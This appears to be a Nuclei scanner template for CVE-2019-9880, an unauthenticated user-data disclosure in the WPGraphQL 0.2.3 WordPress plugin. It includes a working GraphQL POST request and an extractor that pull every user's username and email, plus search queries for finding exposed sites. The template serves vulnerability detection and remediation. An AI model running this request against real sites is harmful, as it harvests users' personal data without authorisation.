id: CVE-2019-9880

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
  author: intelligent-ears
  severity: critical
  description: |
    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, an unauthenticated attacker can retrieve the details of all WordPress users, such as email address, role, and username.
  impact: |
    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information, including email addresses, usernames, and user roles, without authentication.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-9880
    cwe-id: CWE-306
    epss-score: 0.72894
    epss-percentile: 0.98804
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "query { users { nodes { id name email username roles } } }"}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

    extractors:
      - type: json
        name: user-data
        json:
          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'
# digest: 4b0a004830460221009ea5bb341fcae610636226c8b7b94db5494926edb1fc7986e3bc62a28d454b940221009f8cd92b54794b25c8a2131a912d41f515428589cc8bf414cfc8da608b22df14:922c64590222798bb761d5b6d8e72950